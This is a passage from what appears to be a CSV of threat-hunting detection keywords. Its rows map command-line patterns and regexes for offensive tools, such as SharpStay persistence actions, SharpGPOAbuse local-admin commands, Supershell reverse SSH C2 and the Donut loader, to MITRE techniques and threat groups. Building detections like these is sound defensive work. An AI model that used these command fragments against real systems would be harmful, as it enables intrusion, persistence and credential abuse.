BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","162" "* -64 -format=bof 
*",".{0,1000}\s\-64\s\-format\=bof\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","163" "* -64 -format=dll *",".{0,1000}\s\-64\s\-format\=dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","164" "* -64 -format=service-dll *",".{0,1000}\s\-64\s\-format\=service\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","165" "* 9_DPAPI.py*",".{0,1000}\s9_DPAPI\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","166" "* -a 1 -f *.dll -p http*",".{0,1000}\s\-a\s1\s\-f\s.{0,1000}\.dll\s\-p\shttp.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","167" "* -a bruteforce *",".{0,1000}\s\-a\sbruteforce\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","168" "* -a nightmare*",".{0,1000}\s\-a\snightmare.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","169" "* a -r -cfg -sfx -z""SFXAutoInstaller.conf"" 
Standalone.exe*",".{0,1000}\sa\s\-r\s\-cfg\s\-sfx\s\-z\""SFXAutoInstaller\.conf\""\sStandalone\.exe.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#linux","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","170" "* -a spoolsample*",".{0,1000}\s\-a\sspoolsample.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","171" "* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*",".{0,1000}\s\-a\s\-t\stitleFixed\=\'Supershell\s\-\sInject\'\s\-t\sdisableLeaveAlert\=true\s\-t\sdisableReconnect\=true\sssh\s\-J\srssh\:.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","172" "* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*",".{0,1000}\s\-a\s\-t\stitleFixed\=\'Supershell\s\-\sShell\'\s\-t\sdisableLeaveAlert\=true\sssh\s\-J\srssh\:.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","173" "* aad3b435b51404eeaad3b435b51404ee*",".{0,1000}\saad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","176" "* acarsd-info.nse*",".{0,1000}\sacarsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","177" "* ACEshark.py*",".{0,1000}\sACEshark\.py.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","179" "* acltoolkit*",".{0,1000}\sacltoolkit.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","180" "* --action exports --dll C:\Windows\System32\amsi.dll*",".{0,1000}\s\-\-action\sexports\s\-\-dll\sC\:\\Windows\\System32\\amsi\.dll.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","181" "* --Action NewSecurityFiltering --GPOName *",".{0,1000}\s\-\-Action\sNewSecurityFiltering\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 
- T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","182" "* --Action NewSecurityFiltering --GPOName *",".{0,1000}\s\-\-Action\sNewSecurityFiltering\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","183" "* --Action RemoveSecurityFiltering --GPOName *",".{0,1000}\s\-\-Action\sRemoveSecurityFiltering\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","184" "* --Action RemoveSecurityFiltering --GPOName *",".{0,1000}\s\-\-Action\sRemoveSecurityFiltering\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - 
T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","185" "* --action SPRAY_USERS *",".{0,1000}\s\-\-action\sSPRAY_USERS\s.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","186" "* action=BackdoorLNK *",".{0,1000}\saction\=BackdoorLNK\s.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","187" "* action=CreateService servicename=* command=*",".{0,1000}\saction\=CreateService\sservicename\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","188" "* action=ElevatedRegistryKey keyname=Debug keypath*",".{0,1000}\saction\=ElevatedRegistryKey\skeyname\=Debug\skeypath.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","189" "* action=ElevatedUserInitKey 
command=*",".{0,1000}\saction\=ElevatedUserInitKey\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","190" "* action=JunctionFolder dllpath=*.dll guid=*",".{0,1000}\saction\=JunctionFolder\sdllpath\=.{0,1000}\.dll\sguid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","191" "* action=NewLNK filepath=*"" lnkname=*",".{0,1000}\saction\=NewLNK\sfilepath\=.{0,1000}\""\slnkname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","192" "* action=ScheduledTask taskname=* command=*runasuser*",".{0,1000}\saction\=ScheduledTask\staskname\=.{0,1000}\scommand\=.{0,1000}runasuser.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","193" "* action=ScheduledTaskAction taskname=* command=*",".{0,1000}\saction\=ScheduledTaskAction\staskname\=.{0,1000}\scommand\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - 
T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","194" "* action=SchTaskCOMHijack clsid=*",".{0,1000}\saction\=SchTaskCOMHijack\sclsid\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","195" "* action=UserRegistryKey keyname=Debug keypath=HKCU:*",".{0,1000}\saction\=UserRegistryKey\skeyname\=Debug\skeypath\=HKCU\:.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#registry","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","196" "* action=WMIEventSub command=* eventname=*",".{0,1000}\saction\=WMIEventSub\scommand\=.{0,1000}\seventname\=.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","197" "* ADAPE.ps1*",".{0,1000}\sADAPE\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","198" "* adaptiveC2.py*",".{0,1000}\sadaptiveC2\.py.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 
- T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","199" "* ADAudit.ps1*",".{0,1000}\sADAudit\.ps1.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","200" "* ADcheck.py*",".{0,1000}\sADcheck\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","202" "* ADCollector.exe*",".{0,1000}\sADCollector\.exe.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","203" "* --adcs --filter * --ntaccount * --enroll 
*",".{0,1000}\s\-\-adcs\s\-\-filter\s.{0,1000}\s\-\-ntaccount\s.{0,1000}\s\-\-enroll\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","204" "* --adcs --old-bloodhound *",".{0,1000}\s\-\-adcs\s\-\-old\-bloodhound\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","205" "* ADCS.ps1*",".{0,1000}\sADCS\.ps1.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","206" "* adcsync.py*",".{0,1000}\sadcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","0","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","207" "* add * demon.x64.exe*",".{0,1000}\sadd\s.{0,1000}\sdemon\.x64\.exe.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. 
- Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#content","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","208" "* add /target:* /altsecid:X509:*",".{0,1000}\sadd\s\/target\:.{0,1000}\s\/altsecid\:X509\:.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","209" "* add nc without being detected by antivirus*",".{0,1000}\sadd\snc\swithout\sbeing\sdetected\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","210" "* addcomputer_LDAP_spn.py*",".{0,1000}\saddcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege 
Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","211" "* addcomputer_with_spns.py *",".{0,1000}\saddcomputer_with_spns\.py\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","212" "* --AddComputerTask --TaskName * --Author * --Command * --Arguments * --GPOName *",".{0,1000}\s\-\-AddComputerTask\s\-\-TaskName\s.{0,1000}\s\-\-Author\s.{0,1000}\s\-\-Command\s.{0,1000}\s\-\-Arguments\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","213" "* Add-KeeThiefLurker.ps1*",".{0,1000}\sAdd\-KeeThiefLurker\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","214" "* --AddLocalAdmin --UserAccount * --GPOName *",".{0,1000}\s\-\-AddLocalAdmin\s\-\-UserAccount\s.{0,1000}\s\-\-GPOName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take
advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","215" "* AddNewAdminUser.ahk*",".{0,1000}\sAddNewAdminUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","216" "* Add-RemoteRegBackdoor.ps1*",".{0,1000}\sAdd\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 